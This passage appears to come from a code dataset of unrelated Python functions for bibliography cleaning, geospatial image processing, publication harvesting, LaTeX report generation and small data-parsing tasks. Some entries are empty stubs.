print(ub.repr2(ub.dict_hist(place_title)))\n else:\n print('Unknown publications')\n\n if 'report' in entrytypes:\n g = entrytypes['report']\n missing = g[pd.isnull(g['title'])]\n if len(missing):\n print('Missing Title')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n if 'journal' in entrytypes:\n g = entrytypes['journal']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n\n missing = g[pd.isnull(g['journal'])]\n if len(missing):\n print('Missing Journal')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n if 'conference' in entrytypes:\n g = entrytypes['conference']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n\n missing = g[pd.isnull(g['booktitle'])]\n if len(missing):\n print('Missing Booktitle')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n if 'incollection' in entrytypes:\n g = entrytypes['incollection']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n\n missing = g[pd.isnull(g['booktitle'])]\n if len(missing):\n print('Missing Booktitle')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n if 'thesis' in entrytypes:\n g = entrytypes['thesis']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n missing = g[pd.isnull(g['institution'])]\n if len(missing):\n print('Missing Institution')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n # import utool\n # utool.embed()\n\n # Overwrite BibDatabase structure\n bib_database._entries_dict = bibtex_dict\n bib_database.entries = list(bibtex_dict.values())\n\n #conftitle_to_types_set_hist = {key: set(val) for key, val in conftitle_to_types_hist.items()}\n #print(ub.repr2(conftitle_to_types_set_hist))\n\n print('Unknown conference keys:')\n print(ub.repr2(sorted(unknown_pubkeys)))\n print('len(unknown_pubkeys) = %r' % (len(unknown_pubkeys),))\n\n writer = BibTexWriter()\n writer.contents = ['comments', 'entries']\n writer.indent = ' '\n writer.order_entries_by = ('type', 'author', 'year')\n\n new_bibtex_str = bibtexparser.dumps(bib_database, writer)\n\n # Need to check\n #jegou_aggregating_2012\n\n # Fix the Journal Abreviations\n # References:\n # https://www.ieee.org/documents/trans_journal_names.pdf\n\n # Write out clean bibfile in ascii format\n clean_bib_fpath = ub.augpath(bib_fpath.replace(' ', '_'), suffix='_clean')\n\n if not ub.argflag('--dryrun'):\n ut.writeto(clean_bib_fpath, new_bibtex_str)", "def main():\n import shutil\n import json\n\n if not os.path.isdir(args.cache):\n # creation dossier cache\n os.mkdir(args.cache)\n\n if not os.path.exists(args.cache+'/overviews.json'):\n # creation fichier overviews.json a partir d'un fichier ressource\n shutil.copy2(args.overviews, args.cache+'/overviews.json')\n\n with open(args.cache+'/overviews.json') as json_overviews:\n overviews_dict = json.load(json_overviews)\n if not (\"list_OPI\" in overviews_dict):\n overviews_dict[\"list_OPI\"] = []\n\n out_raster_srs = gdal.osr.SpatialReference()\n out_raster_srs.ImportFromEPSG(overviews_dict['crs']['code'])\n conn_string = \"PG:host=\"+host+\" dbname=\"+database+\" user=\"+user+\" password=\"+password\n db_graph = gdal.OpenEx(conn_string, gdal.OF_VECTOR)\n if db_graph is None:\n raise ValueError(\"Connection to database failed\")\n list_filename = glob.glob(args.input)\n if verbose > 0:\n print(len(list_filename), \"fichier(s) a traiter\")\n\n try:\n with open(args.cache+'/cache_mtd.json', 'r') as inputfile:\n mtd = json.load(inputfile)\n except:\n mtd = {}\n\n cliche_dejaTraites = []\n for filename in list_filename:\n cliche = 
Path(filename).stem\n \n if (cliche in overviews_dict['list_OPI']):\n # OPI déja traitée\n cliche_dejaTraites.append(cliche)\n else:\n print('nouvelle image: ', filename)\n color = [randrange(255), randrange(255), randrange(255)]\n while (color[0] in mtd) and (color[1] in mtd[color[0]]) and (color[2] in mtd[color[0]][color[1]]):\n color = [randrange(255), randrange(255), randrange(255)]\n if color[0] not in mtd:\n mtd[color[0]] = {}\n if color[1] not in mtd[color[0]]:\n mtd[color[0]][color[1]] = {}\n mtd[color[0]][color[1]][color[2]] = cliche\n process_image(overviews_dict, db_graph, filename, color, out_raster_srs)\n # on ajout l'OPI traitée a la liste\n overviews_dict[\"list_OPI\"].append(cliche)\n\n with open(args.cache+'/cache_mtd.json', 'w') as outfile:\n json.dump(mtd, outfile)\n\n with open(args.cache+'/overviews.json', 'w') as outfile:\n json.dump(overviews_dict, outfile)\n\n print(\"\\n\", len(list_filename) - len(cliche_dejaTraites),\"/\",len(list_filename),\"OPI(s) ajoutée(s)\")\n if len(cliche_dejaTraites) > 0:\n print(cliche_dejaTraites, \"déjà traitées : OPI non recalculée(s)\")", "def getLandsatCollection():\n ## standardize band names\n bn8 = ['B1', 'B2', 'B3', 'B4', 'B6', 'pixel_qa', 'B5', 'B7']\n bn7 = ['B1', 'B1', 'B2', 'B3', 'B5', 'pixel_qa', 'B4', 'B7']\n bn5 = ['B1', 'B1', 'B2', 'B3', 'B5', 'pixel_qa', 'B4', 'B7']\n bns = ['uBlue', 'Blue', 'Green', 'Red', 'Swir1', 'BQA', 'Nir', 'Swir2']\n\n # create a merged collection from landsat 5, 7, and 8\n ls5 = ee.ImageCollection(\"LANDSAT/LT05/C01/T1_SR\").select(bn5, bns)\n\n ls7 = (ee.ImageCollection(\"LANDSAT/LE07/C01/T1_SR\")\n .filterDate('1999-04-15', '2003-05-30')\n .select(bn7, bns))\n\n ls8 = ee.ImageCollection(\"LANDSAT/LC08/C01/T1_SR\").select(bn8, bns)\n\n merged = ls5.merge(ls7).merge(ls8)\n\n return(merged)", "def add_references_to_papers(infile, dir):\n papers = json.load(open(infile))\n for paper in papers:\n for file in os.listdir(dir):\n if file.split(\".txt\")[0] == paper['doi']: # Must find the correct file to parse\n filename = TEXT_DIR+file\n refs =extract_references_from_txt(filename) #Uses the text files to find references\n paper['references']=refs\n return papers", "def getCubes():", "def pdflookup(pdf, allresults, outformat):\n txt = convert_pdf_to_txt(pdf)\n # remove all non alphanumeric characters\n txt = re.sub(\"\\W\", \" \", txt)\n words = txt.strip().split()[:20]\n gsquery = \" \".join(words)\n bibtexlist = query(gsquery, outformat, allresults)\n return bibtexlist", "def load() -> list:\n peliculas: list = []\n\n with open('./db.json', 'r') as in_file:\n for film in json.load(in_file):\n peliculas.append(film)\n\n # Sort films by ID\n # Useful when asking the user to select a movie\n peliculas = sorted(peliculas, key=lambda x: x['title'])\n return peliculas", "def load_federalist_corpus(filename):\n with open(filename, \"rt\") as f:\n data = f.read()\n papers = data.split(\"FEDERALIST\")\n\n # all start with \"To the people of the State of New York:\" (sometimes . 
instead of :)\n # all end with PUBLIUS (or no end at all)\n locations = [(i, [-1] + [m.end() + 1 for m in re.finditer(r\"of the State of New York\", p)],\n [-1] + [m.start() for m in re.finditer(r\"PUBLIUS\", p)]) for i, p in enumerate(papers)]\n papers_content = [papers[i][max(loc[1]):max(loc[2])] for i, loc in enumerate(locations)]\n\n # discard entries that are not actually a paper\n papers_content = [p for p in papers_content if len(p) > 0]\n\n # replace all whitespace with a single space\n papers_content = [re.sub(r\"\\s+\", \" \", p).lower() for p in papers_content]\n\n # add spaces before all punctuation, so they are separate tokens\n punctuation = set(re.findall(r\"[^\\w\\s]+\", \" \".join(papers_content))) - {\"-\", \"'\"}\n for c in punctuation:\n papers_content = [p.replace(c, \" \" + c + \" \") for p in papers_content]\n papers_content = [re.sub(r\"\\s+\", \" \", p).lower().strip() for p in papers_content]\n\n authors = [tuple(re.findall(\"MADISON|JAY|HAMILTON\", a)) for a in papers]\n authors = [a for a in authors if len(a) > 0]\n\n numbers = [re.search(r\"No\\. \\d+\", p).group(0) for p in papers if re.search(r\"No\\. \\d+\", p)]\n\n return papers_content, authors, numbers", "def _extract_core_biblio(self, bib):\n try:\n pubnumber = bib_scalar(bib, 'pubnumber')\n pubdate = datetime.strptime(bib_scalar(bib, 'pubdate'), '%Y%m%d')\n fam_raw = bib_scalar(bib, 'family_id')\n family_id = int(fam_raw) if fam_raw != None else fam_raw\n assign_applic_raw = bib.get('assign_applic')\n assign_applic = '|'.join(assign_applic_raw) if len(assign_applic_raw) > 0 else \"\"\n except KeyError, exc:\n raise RuntimeError(\"Document is missing mandatory biblio field (KeyError: {})\".format(exc))\n if len(pubnumber) == 0:\n raise RuntimeError(\"Document publication number field is empty\")\n\n return family_id, pubdate, pubnumber, assign_applic", "def replace_bibliography(self, text):\n\n indexBegin = 0\n indexEnd = 0\n indexBegin = text.find('\\\\bibliography{', indexBegin+1)\n indexEnd = text.find('}', indexBegin+1)\n text_to_replace = text[indexBegin:indexEnd+1]\n new_text = self.dir_helper.read_file(file_name = self.temp_dir + self.config.BBL_FILE)\n bbl_text = \"\"\n for line in new_text.split('\\n'):\n bbl_text = bbl_text + '\\t' + line + '\\n'\n text = text.replace(text_to_replace, bbl_text)\n\n return text", "def get_book_titles(self, lib_db):\n titles = []\n conn = sqlite3.connect(lib_db)\n c = conn.cursor()\n for row in c.execute(\"SELECT ZTITLE FROM ZBKLIBRARYASSET WHERE ZTITLE <> '' AND ZTITLE <> 'none'\"):\n titles.append(row[0])\n conn.close()\n return titles", "def parse_bibtex(self, data: str) -> Dict:\n\n new_bib = [line for line in data.splitlines() if \"= ,\" not in line]\n new_bib = \"\\n\".join(new_bib)\n bib_db: bibtexparser.bibdatabase.BibDatabase = bibtexparser.loads(new_bib)\n result = dict()\n for entry in bib_db.entries:\n osti_id = entry[\"ID\"].split(\"_\")[1]\n result[osti_id] = entry\n return result", "def __init__(self):\n self.bib_database = BibDatabase()\n #: Callback function to process BibTeX entries after parsing, for example to create a list from a string with\n #: multiple values. By default all BibTeX values are treated as simple strings. Default: `None`.\n self.customization = None\n\n #: Ignore non-standard BibTeX types (`book`, `article`, etc). Default: `True`.\n self.ignore_nonstandard_types = True\n\n #: Sanitise BibTeX field names, for example change `url` to `link` etc. Field names are always converted to\n #: lowercase names. 
Default: `True`.\n self.homogenise_fields = True\n\n # On some sample data files, the character encoding detection simply\n # hangs We are going to default to utf8, and mandate it.\n self.encoding = 'utf8'\n\n # pre-defined set of key changes\n self.alt_dict = {\n 'keyw': 'keyword',\n 'keywords': 'keyword',\n 'authors': 'author',\n 'editors': 'editor',\n 'url': 'link',\n 'urls': 'link',\n 'links': 'link',\n 'subjects': 'subject'\n }\n\n self.replace_all_re = re.compile(r'((?P<pre>\"?)\\s*(#|^)\\s*(?P<id>[^\\d\\W]\\w*)\\s*(#|$)\\s*(?P<post>\"?))', re.UNICODE)", "def __bol(soup):\n news = []\n anchors = soup.find(\n 'div', class_='mais-clicadas-lista link-primary').find_all('a')\n\n for a in anchors:\n title = a.find('span', class_='mais-clicadas-item-content').text\n link = a['href']\n news.append(dict(title=title, link=link))\n return news", "def get_all_books() -> List[Dict]:\n pass", "def collecte_docs(self, chercheur, overwrite=False): # self,\n init = overwrite # If True, data persistence is lost when references are updated\n docs = hal.find_publications(chercheur[\"halId_s\"], \"authIdHal_s\")\n\n progress_recorder = ProgressRecorder(self)\n progress_recorder.set_progress(0, len(docs), description=\"récupération des données HAL\")\n # Insert documents collection\n for num, doc in enumerate(docs):\n doc[\"country_colaboration\"] = location_docs.generate_countrys_fields(doc)\n doc = doi_enrichissement.docs_enrichissement_doi(doc)\n if \"fr_abstract_s\" in doc.keys():\n if isinstance(doc[\"fr_abstract_s\"], list):\n doc[\"fr_abstract_s\"] = \"/n\".join(doc[\"fr_abstract_s\"])\n if len(doc[\"fr_abstract_s\"]) > 100:\n doc[\"fr_entites\"] = keyword_enrichissement.return_entities(\n doc[\"fr_abstract_s\"], \"fr\"\n )\n doc[\"fr_teeft_keywords\"] = keyword_enrichissement.keyword_from_teeft(\n doc[\"fr_abstract_s\"], \"fr\"\n )\n if \"en_abstract_s\" in doc.keys():\n if isinstance(doc[\"en_abstract_s\"], list):\n doc[\"en_abstract_s\"] = \"/n\".join(doc[\"en_abstract_s\"])\n if len(doc[\"en_abstract_s\"]) > 100:\n doc[\"en_entites\"] = keyword_enrichissement.return_entities(\n doc[\"en_abstract_s\"], \"en\"\n )\n doc[\"en_teeft_keywords\"] = keyword_enrichissement.keyword_from_teeft(\n doc[\"en_abstract_s\"], \"en\"\n )\n\n doc[\"_id\"] = doc[\"docid\"]\n doc[\"validated\"] = True\n\n doc[\"harvested_from\"] = \"researcher\"\n\n doc[\"harvested_from_ids\"] = []\n doc[\"harvested_from_label\"] = []\n\n #\n #\n # print(doc[\"authorship\"], doc ['authLastName_s'])\n\n if len(doc[\"authIdHal_s\"]) != len(doc[\"authLastName_s\"]):\n # print (\"elastichal.py : test d'autorat no good\")\n # test sur le nom complet...\n nom = [\n truc\n for truc in doc[\"authLastName_s\"]\n if chercheur[\"lastName\"].lower() in truc.lower()\n ] # pour les récemment mariés qui auraient un nom composé...\n # Après si 'lun des co-auteur porte le même nom...\n if len(nom) > 0:\n nom = nom[0].title()\n try:\n if doc[\"authLastName_s\"].index(nom) == 0: # premier\n doc[\"authorship\"] = [\n {\"authorship\": \"firstAuthor\", \"authIdHal_s\": chercheur[\"halId_s\"]}\n ]\n elif (\n doc[\"authLastName_s\"].index(nom) == len(doc[\"authLastName_s\"]) - 1\n ): # dernier\n doc[\"authorship\"] = [\n {\"authorship\": \"lastAuthor\", \"authIdHal_s\": chercheur[\"halId_s\"]}\n ]\n except ValueError:\n doc[\"authorship\"] = []\n else:\n doc[\"authorship\"] = []\n elif chercheur[\"halId_s\"] in doc[\"authIdHal_s\"]:\n if doc[\"authIdHal_s\"].index(chercheur[\"halId_s\"]) == 0:\n doc[\"authorship\"] = [\n {\"authorship\": 
\"firstAuthor\", \"authIdHal_s\": chercheur[\"halId_s\"]}\n ]\n elif (\n doc[\"authIdHal_s\"].index(chercheur[\"halId_s\"]) == len(doc[\"authIdHal_s\"]) - 1\n ): # dernier\n doc[\"authorship\"] = [\n {\"authorship\": \"lastAuthor\", \"authIdHal_s\": chercheur[\"halId_s\"]}\n ]\n else:\n doc[\"authorship\"] = []\n else:\n doc[\"authorship\"] = []\n\n doc[\"harvested_from_ids\"].append(chercheur[\"halId_s\"])\n\n # historique d'appartenance du docId\n # pour attribuer les bons docs aux chercheurs\n # harvet_history.append({'docid': doc['docid'], 'from': row['halId_s']})\n #\n # for h in harvet_history:\n # if h['docid'] == doc['docid']:\n # if h['from'] not in doc[\"harvested_from_ids\"]:\n # doc[\"harvested_from_ids\"].append(h['from'])\n\n doc[\"records\"] = []\n\n doc[\"MDS\"] = utils.calculate_mds(doc)\n\n try:\n should_be_open = utils.should_be_open(doc)\n if should_be_open == 1:\n doc[\"should_be_open\"] = True\n if should_be_open == -1:\n doc[\"should_be_open\"] = False\n\n if should_be_open == 1 or should_be_open == 2:\n doc[\"isOaExtra\"] = True\n elif should_be_open == -1:\n doc[\"isOaExtra\"] = False\n except IndexError:\n print(\"publicationDate_tdate error ?\")\n doc[\"Created\"] = datetime.datetime.now().isoformat()\n\n if not init: # récupération de l'existant pour ne pas écraser\n field = \"_id\"\n doc_param = esActions.scope_p(field, doc[\"_id\"])\n\n if not es.indices.exists(\n index=chercheur[\"structSirene\"]\n + \"-\"\n + chercheur[\"labHalId\"]\n + \"-researchers-\"\n + chercheur[\"ldapId\"]\n + \"-documents\"\n ): # -researchers\" + row[\"ldapId\"] + \"-documents\n print(\"exception \", chercheur[\"labHalId\"], chercheur[\"ldapId\"])\n\n res = es.search(\n index=chercheur[\"structSirene\"]\n + \"-\"\n + chercheur[\"labHalId\"]\n + \"-researchers-\"\n + chercheur[\"ldapId\"]\n + \"-documents\",\n body=doc_param,\n ) # -researchers\" + row[\"ldapId\"] + \"-documents\n\n if len(res[\"hits\"][\"hits\"]) > 0:\n doc[\"validated\"] = res[\"hits\"][\"hits\"][0][\"_source\"][\"validated\"]\n if \"authorship\" in res[\"hits\"][\"hits\"][0][\"_source\"]:\n doc[\"authorship\"] = res[\"hits\"][\"hits\"][0][\"_source\"][\"authorship\"]\n\n if (\n res[\"hits\"][\"hits\"][0][\"_source\"][\"modifiedDate_tdate\"]\n != doc[\"modifiedDate_tdate\"]\n ):\n doc[\"records\"].append(\n {\n \"beforeModifiedDate_tdate\": doc[\"modifiedDate_tdate\"],\n \"MDS\": res[\"hits\"][\"hits\"][0][\"_source\"][\"MDS\"],\n }\n )\n\n else:\n doc[\"validated\"] = True\n progress_recorder.set_progress(num, len(docs), description=\"(récolte)\")\n progress_recorder.set_progress(num, len(docs), description=\"(indexation)\")\n helpers.bulk(\n es,\n docs,\n index=chercheur[\"structSirene\"]\n + \"-\"\n + chercheur[\"labHalId\"]\n + \"-researchers-\"\n + chercheur[\"ldapId\"]\n + \"-documents\",\n refresh=\"wait_for\",\n )\n\n return chercheur # au cas où", "def create_book_objects(content):\n library = []\n for book in content:\n library.append(Book(book['Author'], book['Title'], book['Publisher'], book['Shelf'], book['Category'],\n book['Subject']))\n print('Your Library has been loaded.')\n return library", "def bib_scalar(biblio, key):\n return biblio[key][0]", "def build_latex(file_list):\n eingabe=[]\n anhang_count=0\n anhaenge=[]\n anhaenge_file=[]\n for file in file_list:\n x=load_file(file)[1]\n eingabe.append(\"\\section{%s}\" %(x[2]))\n eingabe.append(\"\\subsection{Infos}\")\n eingabe.append(\"\\\\begin{tabularx}{\\linewidth}{@{}lX}\")\n eingabe.append(r\"\\textbf{Datum} & %s\\\\\" %(x[0]))\n 
eingabe.append(r\"\\textbf{Gremium} & %s\\\\\" %(x[1]))\n eingabe.append(r\"\\textbf{Anatrag/Beschluss wurde} & %s\\\\\" %(x[9]))\n x[11]=x[11].replace(\" \",\"\")\n kw=x[11].split(\",\")\n for i in range(0,len(kw)):\n if i==0:\n eingabe.append(r\"\\textbf{Keyword:} & %s\\\\\" %(kw[i]))\n else:\n eingabe.append(r\" & %s\\\\\" %(kw[i]))\n eingabe.append(\"\\end{tabularx}\")\n eingabe.append(\"\\\\begin{tabularx}{\\linewidth}{@{}XXX}\")\n eingabe.append(r\"\\textbf{Abstimmungsergebniss:}&&\\\\\")\n eingabe.append(r\"Zustimmung & Ablehnung & Enthaltungen \\\\\")\n eingabe.append(r\"{} & {} & {} \\\\\".format(x[6],x[7],x[8]))\n eingabe.append(\"\\end{tabularx}\")\n eingabe.append(\"\\subsection{Antrags/Beschlusstext}\")\n line_text=len(eingabe)\n eingabe.append(x[3])\n eingabe.append(\"\\subsection{Begründung}\")\n eingabe.append(x[4])\n if x[23]==\"Ja\" and x[24]!=\"\":\n delta=7\n anzahl=int((len(x)-23)/delta)\n if anzahl==1:\n eingabe.append(\"\\subsection{Änderungsantrag}\")\n eingabe.append(\"\\subsubsection*{Vorschlag}\")\n eingabe.append(x[24])\n eingabe.append(\"\\subsubsection*{Begründung}\")\n eingabe.append(x[25]+\"\\\\vspace{1.5ex} \\\\\\\\\")\n eingabe.append(\"\\\\begin{tabularx}{\\linewidth}{@{}XXX}\")\n eingabe.append(r\"\\textbf{Abstimmungsergebniss:}&&\\\\\")\n eingabe.append(r\"Zustimmung & Ablehnung & Enthaltungen \\\\\")\n eingabe.append(r\"{} & {} & {} \\\\\".format(x[26],x[27],x[28]))\n eingabe.append(r\"\\multicolumn{2}{@{}l}{\\textbf{Änderungsantrag wurde:}} & %s \\\\\" %(x[29]))\n eingabe.append(\"\\\\end{tabularx}\")\n else:\n eingabe.append(\"\\subsection{Änderungsanträge}\")\n for i in range(0,anzahl):\n eingabe.append(\"\\subsubsection{Änderungsvorschlag %s}\" %(i+1))\n eingabe.append(\"\\\\paragraph*{Vorschlag}\")\n eingabe.append(x[24+(delta*i)])\n eingabe.append(\"\\\\paragraph*{Begründung}\")\n eingabe.append(x[25+(delta*i)]+\"\\\\vspace{1.5ex} \\\\\\\\\")\n eingabe.append(\"\\\\begin{tabularx}{\\linewidth}{@{}XXX}\")\n eingabe.append(r\"\\textbf{Abstimmungsergebniss:}&&\\\\\")\n eingabe.append(r\"Zustimmung & Ablehnung & Enthaltungen \\\\\")\n eingabe.append(r\"{} & {} & {} \\\\\".format(x[26+(delta*i)],x[27+(delta*i)],x[28+(delta*i)]))\n eingabe.append(r\"\\multicolumn{2}{@{}l}{\\textbf{Änderungsantrag wurde:}} & %s \\\\\" %(x[29+(delta*i)]))\n eingabe.append(\"\\\\end{tabularx}\")\n if x[10]!=\"\":\n anhang=x[10].split(\",\")\n bennenung=x[11].split(\",\")\n eingabe[line_text]=eingabe[line_text]+\"\\\\\\\\ \\n Dieser Antrag enthält %s Anhänge: \" %(len(anhang))\n for i in range(0,len(anhang)):\n anhang_count=anhang_count+1\n anhaenge.append(\"\\section{%s - %s} \\label{An:%s}\" % (x[2],bennenung[i],str(anhang_count)))\n anhaenge.append(\"\\includepdf[pages=-]{%s}\" %(anhang[i]))\n anhaenge_file.append(anhang[i])\n if i!=len(anhang)-1:\n eingabe[line_text]=eingabe[line_text]+\"\\\\nameref{An:%s}, \" % (str(anhang_count))\n else:\n eingabe[line_text]=eingabe[line_text]+\"\\\\nameref{An:%s} \" % (str(anhang_count)) \n \n eingabe.append(\"\\\\newpage\") \n eingabe.append(\"\\\\appendix\") \n eingabe.append(\"\\\\pagenumbering{Roman}\") \n ausgabe=\"\"\n for i in range(0,len(eingabe)):\n ausgabe=ausgabe+eingabe[i]+\"\\n\"\n \n for i in range(0,len(anhaenge)):\n ausgabe=ausgabe+anhaenge[i]+\"\\n\"\n \n return ausgabe,anhaenge_file", "def test_init_bibdesk(bib_bibdesk):\n bd_bib = Bibliography(bib_bibdesk, creator='BibDesk')\n\n # Assert it is all there, especially the appendix\n assert bd_bib.file\n assert bd_bib.data\n assert bd_bib.appdx\n assert 
bd_bib.appdx.startswith('@comment{BibDesk')", "def load_references(self, collections, item):", "def list(full, field):\n\n short = not full \n\n libraries = select(l for l in Library if l)[:]\n libraries = natsorted(libraries, key=lambda x : attrgetter('name')(x).lower())\n\n if len(libraries) == 0:\n logger.info(\"[!] No libraries available to list.\") \n logger.info(\" Consider run the following command:\")\n logger.info(\" $ apkg init\")\n return \n\n\n\n orderFields = [ \n #, \"library\"\n #, \"sha\"\n \"description\"\n # , \"license\"\n # , \"include\"\n # , \"depend\"\n # , \"testedWith\"\n , \"keywords\"\n # , \"installed\"\n # , \"cached\"\n # , \"fromIndex\"\n # , \"fromUrl\"\n # , \"fromGit\"\n , \"origin\"\n # , \"default\"\n ]\n\n i = 0\n if short and field == \"\":\n logger.info(\"{:<20.20} {:<15.20} {:.72}\"\n .format(\"Library name\", \"Latest version\", \"URL\"))\n logger.info(\"-\"*105)\n\n for library in libraries:\n v = library.getLatestVersion() \n if v is not None:\n if not short:\n\n logger.info(v.library.name)\n logger.info(\"=\"*len(v.library.name))\n\n info = v.info\n\n for k in orderFields: \n val = info.get(k, None)\n if val is not None or val != \"\" or len(val) > 0:\n click.echo(\"{0}: {1}\".format(k,val))\n\n vs = ','.join(str(ver) for ver in v.library.versions)\n \n if len(vs) > 0:\n print(\"Versions:\", vs)\n \n else:\n if field in listFields:\n if field == \"name\":\n print(v.library.name)\n elif field == \"version\":\n print(v.name)\n else:\n print(v.library.url)\n else:\n print(\"{:<20.20} {:<15.20} {:.72}\"\n .format(v.library.name,v.name,v.library.url))\n\n i += 1\n if not short and i < len(libraries):\n logger.info(\"\")", "def generarConsultasLibres(self): \n \n for idw,word in enumerate(self.key_words):\n consultasparql = self.busLibre % (word,self.limit_BL)\n self.ConsultasLibres.append(consultasparql)\n \n \n return self.ConsultasLibres", "def getJar(oldDatas,jarList):\n #clear pastebin here. confirmed.\n if pastebin in os.listdir():\n tempdir = barrand6()\n os.rename(pastebin,tempdir)#clever..fine..\n shutil.rmtree(tempdir)#acces deniyed ..fixed!\n os.mkdir(pastebin)\n\n\n oldDatakeys = oldDatas.keys()\n newDatas = {} #for data insure.\n\n for noFolder in jarList:\n try:\n #txtFiledir = os.path.join( origins,noFolder,noFolder+'.txt')\n txtFilename = noFolder+'.txt'\n #------------------------user pre-sure.\n txtfiles = []\n for f in os.listdir( os.path.join( jar,noFolder) ):\n if '.txt' in f:\n txtfiles.append(f)\n if len(txtfiles) == 1:\n txtFilename = txtfiles[0]\n else:\n if not '설정.txt' in txtfiles:\n raise Exception('ERROR no txt : ' + str(noFolder))\n txtFilename = '설정.txt'\n #------------------------user pre-sure\n\n txtFile = os.path.join( jar,noFolder,txtFilename) #whatif dir = no.txt?\n parsedDict = txt2dict.parseTxt(txtFile,parseKeys,multiLineKey)#hope it's atleast complete...\n\n #----------------------for custom dict additional option\n checklist = ['번호','제목','작성자','날짜','본문']\n for c in checklist:\n if not c in parsedDict.keys():\n raise Exception('ERROR!! not format txt : ' + str(noFolder))\n\n #user input, do another func.\n #'16'.isdigit()\n #if int(parsedDict['번호'])<1:\n #raise Exception('ERROR!! 
of : ' + str(noFolder))\n #a = parsedDict['날짜'].split('.')\n #b = str(datetime.date.today()).split('-')\n #if datetime.date(a[0],a[1],a[2]) < datetime.date.today()\n\n if '태그' in parsedDict.keys():\n tagList = parsedDict['태그'].split(',')\n parsedDict['유저태그'] = tagList\n del parsedDict['태그']\n else:\n parsedDict['유저태그'] = []\n\n if parsedDict['제목'].startswith('[번역]'):\n parsedDict['제목'] = parsedDict['제목'].split('[번역]')[1].strip()\n if parsedDict['제목'].find('센세)') != -1 :\n parsedDict['유저태그'].append( parsedDict['제목'].split('센세)')[0].strip()+'센세' )\n #parsedDict['태그'].append( a.split('[번역]')[1].strip().split('센세)')[0]+'센세)' )\n #----------------------for custom dict additional option\n\n\n #----------------------------- after get parsedDict.\n tmpKey = parsedDict[idKey] #9133114\n if tmpKey in oldDatakeys:\n raise Exception('skip.. id already in parsedict ..: ' + str(noFolder))\n\n idFoldername = parsedDict['번호']\n noFolderpath = os.path.join( jar,noFolder )\n originPath = os.path.join( origins , idFoldername )\n shutil.copytree(noFolderpath,originPath, dirs_exist_ok = False)# was true, but to integrity....\n #it occured at test. nodict, but files.\n #shutil.move(noFolderpath,pastebin)\n\n\n #datas is dict object, appended new key,value.\n #add more value.\n #datas[tmpKey]['key'] = 'value'\n\n # get moved nofolder, add datas originImgs.\n originFiles = os.listdir(os.path.join( origins, idFoldername))\n originImgs = []\n for img in originFiles:\n ext = os.path.splitext( img )[1][1:] # .jpg == jpg\n if ext in imgExt: #now, it's img.\n originImgs.append(img)\n if originImgs==[]:\n raise Exception('ERROR!! no img..: ' + str(noFolder))\n parsedDict[originKey] = originImgs\n\n newDatas[tmpKey] = parsedDict\n #datas[tmpKey][allfilesKey] = originFiles\n thisrand=barrand6()\n os.rename( os.path.join( jar,noFolder), pastebin+'/'+noFolder+thisrand )\n\n except Exception as e:\n exc_info = sys.exc_info()#below except.\n errmsg = exc_info[1],':at line',exc_info[2].tb_lineno\n print(errmsg)\n\n thisrand=barrand6()\n os.rename( os.path.join( jar,noFolder), pastebin+'/'+noFolder+thisrand )\n f = open('./'+pastebin+'/'+noFolder+thisrand+'/err.txt','w',encoding='utf-8')\n f.write(str(errmsg))\n f.close()\n print( 'ERROR occured. 
gone pastebin :',str(noFolder)+thisrand)\n continue\n\n return newDatas", "def merge_docs(self):", "def globes(self, code):\n return {\n 'ariel': 'http://www.wikidata.org/entity/Q3343',\n 'bennu': 'http://www.wikidata.org/entity/Q11558',\n 'callisto': 'http://www.wikidata.org/entity/Q3134',\n 'ceres': 'http://www.wikidata.org/entity/Q596',\n 'deimos': 'http://www.wikidata.org/entity/Q7548',\n 'dione': 'http://www.wikidata.org/entity/Q15040',\n 'earth': 'http://www.wikidata.org/entity/Q2',\n 'enceladus': 'http://www.wikidata.org/entity/Q3303',\n 'eros': 'http://www.wikidata.org/entity/Q16711',\n 'europa': 'http://www.wikidata.org/entity/Q3143',\n 'ganymede': 'http://www.wikidata.org/entity/Q3169',\n 'gaspra': 'http://www.wikidata.org/entity/Q158244',\n 'hyperion': 'http://www.wikidata.org/entity/Q15037',\n 'iapetus': 'http://www.wikidata.org/entity/Q17958',\n 'io': 'http://www.wikidata.org/entity/Q3123',\n 'jupiter': 'http://www.wikidata.org/entity/Q319',\n 'lutetia': 'http://www.wikidata.org/entity/Q107556',\n 'mars': 'http://www.wikidata.org/entity/Q111',\n 'mercury': 'http://www.wikidata.org/entity/Q308',\n 'mimas': 'http://www.wikidata.org/entity/Q15034',\n 'miranda': 'http://www.wikidata.org/entity/Q3352',\n 'moon': 'http://www.wikidata.org/entity/Q405',\n 'oberon': 'http://www.wikidata.org/entity/Q3332',\n 'phobos': 'http://www.wikidata.org/entity/Q7547',\n 'phoebe': 'http://www.wikidata.org/entity/Q17975',\n 'pluto': 'http://www.wikidata.org/entity/Q339',\n 'rhea': 'http://www.wikidata.org/entity/Q15050',\n 'ryugu': 'http://www.wikidata.org/entity/Q1385178',\n 'steins': 'http://www.wikidata.org/entity/Q150249',\n 'tethys': 'http://www.wikidata.org/entity/Q15047',\n 'titan': 'http://www.wikidata.org/entity/Q2565',\n 'titania': 'http://www.wikidata.org/entity/Q3322',\n 'triton': 'http://www.wikidata.org/entity/Q3359',\n 'umbriel': 'http://www.wikidata.org/entity/Q3338',\n 'venus': 'http://www.wikidata.org/entity/Q313',\n 'vesta': 'http://www.wikidata.org/entity/Q3030',\n }", "def turysci(lista):\n # wynik - lista zawierajaca wynik koncowy dzialania funkcji(lata i wartosci dla poszczegolnych panstw)\n wynik = []\n for panstwo in lista:\n # rok - lista zawierajaca lata\n # wartosc - lista zawierajaca wartosci dla lat\n rok = []\n wartosc = []\n for element in panstwo:\n # sprawdzenie czy klucz posiada odpowiednia wartosc\n if element[1].get('key') == \"ST.INT.ARVL\":\n # dodanie roku do listy\n rok.append(int(element[2].text))\n # rozpatrywanie przypadku w ktorym wartosc jest None\n if element[3].text is None:\n wartosc.append(element[3].text)\n else:\n wartosc.append(float(element[3].text))\n # dodawanie list dla poszczegolnych panstw do listy wynikowej\n wynik.append(rok)\n wynik.append(wartosc)\n\n return wynik", 